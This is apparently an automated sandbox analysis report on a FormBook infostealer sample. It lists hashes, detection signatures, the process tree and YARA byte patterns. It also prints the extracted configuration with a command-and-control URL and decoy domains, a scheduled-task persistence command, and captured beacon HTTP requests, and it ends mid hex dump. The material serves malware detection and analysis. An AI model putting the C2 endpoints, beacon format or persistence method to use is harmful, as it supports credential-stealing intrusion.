Play interactive tour

Edit tour

Analysis Report gzU8odwaPalRTGB.exe

Overview

General Information

Sample Name:	gzU8odwaPalRTGB.exe
Analysis ID:	383962
MD5:	bc0859493d8419f5ffe0468d23938256
SHA1:	70c3b42db2fc29bb0de21db911b85adf600fb9f2
SHA256:	64f1791681e261b0e652130f8f7fca8e1098a4c03fee49652a14d682681f85cf
Tags:	Formbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

gzU8odwaPalRTGB.exe (PID: 3092 cmdline: 'C:\Users\user\Desktop\gzU8odwaPalRTGB.exe' MD5: BC0859493D8419F5FFE0468D23938256)

schtasks.exe (PID: 2596 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

RegSvcs.exe (PID: 6228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

rundll32.exe (PID: 6904 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 7068 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.smarttel.management/msc/"], "decoy": ["vanwertfamilyhealth.com", "amiawke.com", "hq-leaks.net", "playersgolfworld.info", "atlantaoffshore.com", "redstateaf.com", "leosquad.world", "elchtec.com", "mjshenanigans.com", "rbsccj.com", "360healthy.life", "sympa.digital", "afrotresor.com", "amazingliberty.com", "realsults.com", "preethamgudichuttu.com", "anastasiavegilates.com", "blockchainfest.asia", "viaverdeproject.net", "shouryashukla.com", "african-elephant.com", "factorysale.online", "vqxxmrxhpsho.mobi", "munchstaging.com", "codealemayohabrha.com", "melrosecakecompany.com", "themaskamigo.com", "aviatop.online", "coivdanswers.com", "geralouittane.com", "amazonshack.com", "aeguana.info", "samaalkaleej.com", "disruptorgen.com", "crystalcpv.com", "lsertsex.com", "affiliatesupersummit.com", "tintuc-247.info", "balakawu.com", "smartecomall.com", "chorahouses.com", "bellezaorganica.club", "greenbayhemorrhoidcenter.com", "iklanlaskar.com", "oldtownbusinessdistrict.com", "hindmetalhouse.com", "diligentpom.com", "genetic-web.com", "novergi.com", "sincetimebegan.com", "foodyfie.com", "wfiboostrs.com", "startuphrs.com", "vkjuzcsh.icu", "primarewards.net", "snappygarden.com", "rangerpoint.net", "meramission.com", "adsatadvanstar.com", "railrockers.com", "smartlightinggreenidea.com", "streetsmartlove.net", "shnfxj.com", "sms-master.online"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x920b0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9232a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xbeef0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xbf16a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9de4d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xcac8d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x9d939:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xca779:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x9df4f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xcad8f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x9e0c7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xcaf07:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x92d42:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xbfb82:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x9cbb4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xc99f4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x93a3b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xc087b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xa3aef:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xd092f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xa4af2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xa0bd1:$sqlite3step: 68 34 1C 7B E1 0xa0ce4:$sqlite3step: 68 34 1C 7B E1 0xcda11:$sqlite3step: 68 34 1C 7B E1 0xcdb24:$sqlite3step: 68 34 1C 7B E1 0xa0c00:$sqlite3text: 68 38 2A 90 C5 0xa0d25:$sqlite3text: 68 38 2A 90 C5 0xcda40:$sqlite3text: 68 38 2A 90 C5 0xcdb65:$sqlite3text: 68 38 2A 90 C5 0xa0c13:$sqlite3blob: 68 53 D8 7F 8C 0xa0d3b:$sqlite3blob: 68 53 D8 7F 8C 0xcda53:$sqlite3blob: 68 53 D8 7F 8C 0xcdb7b:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: gzU8odwaPalRTGB.exe PID: 3092	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.RegSvcs.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.RegSvcs.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
5.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.RegSvcs.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.RegSvcs.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\gzU8odwaPalRTGB.exe' , ParentImage: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe, ParentProcessId: 3092, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp', ProcessId: 2596

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: gzU8odwaPalRTGB.exe

Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\fgEePtnFJH.exe

Avira: detection malicious, Label: HEUR/AGEN.1138557

Found malware configuration

Show sources

Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.smarttel.management/msc/"], "decoy": ["vanwertfamilyhealth.com", "amiawke.com", "hq-leaks.net", "playersgolfworld.info", "atlantaoffshore.com", "redstateaf.com", "leosquad.world", "elchtec.com", "mjshenanigans.com", "rbsccj.com", "360healthy.life", "sympa.digital", "afrotresor.com", "amazingliberty.com", "realsults.com", "preethamgudichuttu.com", "anastasiavegilates.com", "blockchainfest.asia", "viaverdeproject.net", "shouryashukla.com", "african-elephant.com", "factorysale.online", "vqxxmrxhpsho.mobi", "munchstaging.com", "codealemayohabrha.com", "melrosecakecompany.com", "themaskamigo.com", "aviatop.online", "coivdanswers.com", "geralouittane.com", "amazonshack.com", "aeguana.info", "samaalkaleej.com", "disruptorgen.com", "crystalcpv.com", "lsertsex.com", "affiliatesupersummit.com", "tintuc-247.info", "balakawu.com", "smartecomall.com", "chorahouses.com", "bellezaorganica.club", "greenbayhemorrhoidcenter.com", "iklanlaskar.com", "oldtownbusinessdistrict.com", "hindmetalhouse.com", "diligentpom.com", "genetic-web.com", "novergi.com", "sincetimebegan.com", "foodyfie.com", "wfiboostrs.com", "startuphrs.com", "vkjuzcsh.icu", "primarewards.net", "snappygarden.com", "rangerpoint.net", "meramission.com", "adsatadvanstar.com", "railrockers.com", "smartlightinggreenidea.com", "streetsmartlove.net", "shnfxj.com", "sms-master.online"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\fgEePtnFJH.exe

ReversingLabs: Detection: 29%

Multi AV Scanner detection for submitted file

Show sources

Source: gzU8odwaPalRTGB.exe

ReversingLabs: Detection: 29%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\fgEePtnFJH.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: gzU8odwaPalRTGB.exe

Joe Sandbox ML: detected

Source: 5.2.RegSvcs.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: gzU8odwaPalRTGB.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: gzU8odwaPalRTGB.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.291054222.000000000EC20000.00000002.00000001.sdmp
Source:	Binary string: RegSvcs.pdb, source: rundll32.exe, 0000000F.00000002.506707645.000000000549F000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.306866453.000000000100F000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, rundll32.exe
Source:	Binary string: rundll32.pdb source: RegSvcs.exe, 00000005.00000002.306707675.0000000000DE0000.00000040.00000001.sdmp
Source:	Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000005.00000002.306707675.0000000000DE0000.00000040.00000001.sdmp
Source:	Binary string: RegSvcs.pdb source: rundll32.exe, 0000000F.00000002.506707645.000000000549F000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.291054222.000000000EC20000.00000002.00000001.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	5_2_00416CA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	5_2_00417D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	15_2_00F76CA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	15_2_00F77D70

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.smarttel.management/msc/

Source: global traffic	HTTP traffic detected: GET /msc/?szr8=ZuDCMQ3I4T3VSTegk+AGxuqfe6TeNyWCjdwuw+un6PC0oplRc+HjqgF4wozRSCgma/XR&4hnPsj=W2J4SLjHGHypclVp HTTP/1.1Host: www.novergi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /msc/?szr8=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pJnEzWIQGWFv&4hnPsj=W2J4SLjHGHypclVp HTTP/1.1Host: www.realsults.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	ASN Name: ACPCA ACPCA
Source: Joe Sandbox View	ASN Name: HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK

Source: global traffic	HTTP traffic detected: GET /msc/?szr8=ZuDCMQ3I4T3VSTegk+AGxuqfe6TeNyWCjdwuw+un6PC0oplRc+HjqgF4wozRSCgma/XR&4hnPsj=W2J4SLjHGHypclVp HTTP/1.1Host: www.novergi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /msc/?szr8=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pJnEzWIQGWFv&4hnPsj=W2J4SLjHGHypclVp HTTP/1.1Host: www.realsults.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.novergi.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 11:13:25 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 73 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 